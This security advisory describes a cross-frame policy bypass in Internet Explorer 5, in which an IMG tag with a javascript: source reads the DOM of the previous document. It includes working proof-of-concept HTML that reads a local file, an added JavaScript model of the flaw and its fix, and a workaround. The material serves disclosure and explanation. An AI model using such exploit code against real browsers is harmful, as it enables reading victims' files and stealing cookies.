COMMAND
Internet Explorer
SYSTEMS AFFECTED
IE 5.01 (Windows 95) and IE 5.5 (Windows NT 4.0); other versions presumed vulnerable
PROBLEM
Georgi Guninski found the following. Internet Explorer 5.01 under
Windows 95 and 5.5 under Windows NT 4.0 (other versions are presumably
also vulnerable) allow the "Cross frame security policy" to be
circumvented by accessing the DOM of the "old" document in a window via
<IMG SRC="javascript:...">
combined with a design flaw in IE. This exposes the whole DOM of the
target document and opens up many security risks: reading local files,
reading files from any host the victim window can load, window
spoofing, stealing cookies, etc.
The exploit is unusual. When a new document is loaded into a window
that already contains a document, the old document's DOM remains
accessible to the new document until the new document has been
completely parsed and displayed; IE evidently keeps the old document
alive until then. If the new document contains an
<IMG SRC="javascript:...">
the script in that URL runs while the old document is still present and
therefore has access to the old document's DOM. In the demonstration
below the old document is a local file opened in a named window, and
the javascript: URL opens a further window whose opener.document still
refers to that local file, so its text can be read. Examine the source
code for more details. The code is:
-----------------img2main.html-------------------------------
<A HREF="img2.html" TARGET="victim">link</A>
<SCRIPT>
alert("Create a short text file C:\\test.txt and it will be read and shown in a message box");
// Open the local file in a window named "victim"; its DOM is the target.
a=window.open("file://c:/test.txt","victim");
// After 2 s, navigate the victim window to img2.html. The old document
// (the local file) stays in the window until img2.html is fully parsed.
setTimeout("document.links[0].click()",2000);
</SCRIPT>
-------------------------------------------------------------
----------------img2.html------------------------------------
<HTML>
<!-- The javascript: URL in the IMG SRC runs while the old document is
     still in the window. It opens a new window whose opener.document is
     the stale local file, and reads that file's text. -->
<IMG SRC="javascript:a=window.open('javascript:alert(\'Here is your file: \'+opener.document.body.innerText)');alert('Just an alert, but is necessary. Wait a little.')">
</HTML>
-------------------------------------------------------------
A demonstration is available at:
http://www.nat.bg/~joro/img2main.html
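To make the mechanism concrete, here is an added example that is not part of Guninski's advisory or its demonstration code: a small JavaScript (Node.js) model of a browser window whose committed document is only replaced once the new document finishes parsing. The names Window, Document, navigate, openJavascriptUrl, readBody and the attacker URL are invented for the illustration. exploit(false) models IE 5 as the advisory describes it, where a javascript: URL opened during the navigation inherits the origin of the stale document; exploit(true) models the check a browser should apply, taking the origin from the document whose markup is actually executing.

```javascript
'use strict';
// Added example, not from the advisory. A hypothetical model of a browser
// window during navigation; all names here are invented for illustration.

// Security origin of a URL: scheme plus host (file: URLs have no real host).
function originOf(url) {
  const m = /^([a-z]+):\/\/([^/]*)/i.exec(url);
  if (!m) throw new Error('unsupported URL: ' + url);
  return m[1].toLowerCase() + '://' + m[2].toLowerCase();
}

class Document {
  constructor(url, bodyText) {
    this.url = url;
    this.origin = originOf(url);
    this.bodyText = bodyText;   // stands in for document.body.innerText
  }
}

class Window {
  constructor(doc, opener) {
    this.document = doc;        // committed document (window.document)
    this.loading = null;        // document currently being parsed, if any
    this.opener = opener || null;
  }
}

// Navigation as the advisory describes IE 5 doing it: the new document is
// parsed while the old one is still window.document.
function navigate(win, newDoc) {
  win.loading = newDoc;
}

// Parsing finished: only now does the new document replace the old one.
function finishLoad(win) {
  win.document = win.loading;
  win.loading = null;
}

// Origin attributed to script triggered by the loading document's markup
// (e.g. an <IMG SRC="javascript:...">). fixed=false is the IE 5 model.
function runningOrigin(win, fixed) {
  if (fixed && win.loading) return win.loading.origin; // the page whose markup is executing
  return win.document.origin;                          // stale committed document
}

// A window.open('javascript:...') inherits the origin of the calling script.
function openJavascriptUrl(win, fixed) {
  const child = new Window(new Document('javascript://inherited', ''), win);
  child.document.origin = runningOrigin(win, fixed);
  return child;
}

// Cross-frame (same-origin) check applied to DOM access between windows.
function readBody(accessor, target) {
  if (accessor.document.origin !== target.document.origin) {
    throw new Error('access denied: ' + accessor.document.origin +
                    ' -> ' + target.document.origin);
  }
  return target.document.bodyText;
}

// Replay the advisory's scenario. Returns the text read, or null if denied.
function exploit(fixed) {
  // Constructed sample: the victim window holds a local file.
  const victim = new Window(new Document('file://c:/test.txt', 'secret local data'));
  // The attacker's img2.html starts loading into the victim window.
  navigate(victim, new Document('http://attacker.example/img2.html', ''));
  // Its <IMG SRC="javascript:..."> calls window.open('javascript:...')
  // while victim.document is still the local file.
  const popup = openJavascriptUrl(victim, fixed);
  try {
    return readBody(popup, popup.opener);   // opener.document.body.innerText
  } catch (e) {
    return null;
  } finally {
    finishLoad(victim);
  }
}

console.log('IE 5 model  :', exploit(false));
console.log('fixed model :', exploit(true));
```

The difference between the two runs is one line: which document the running script's origin is taken from. In the stale model the javascript: popup is born with the file: origin of the document that is about to be discarded, so the same-origin check passes and the local file is read. Taking the origin from the document whose markup triggered the script, as browsers do today, makes the popup cross-origin to the old document and the read is refused.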
SOLUTION
Workaround: disable Active Scripting for untrusted zones (Tools > Internet Options > Security > Custom Level). This also blocks the javascript: URLs that the attack depends on.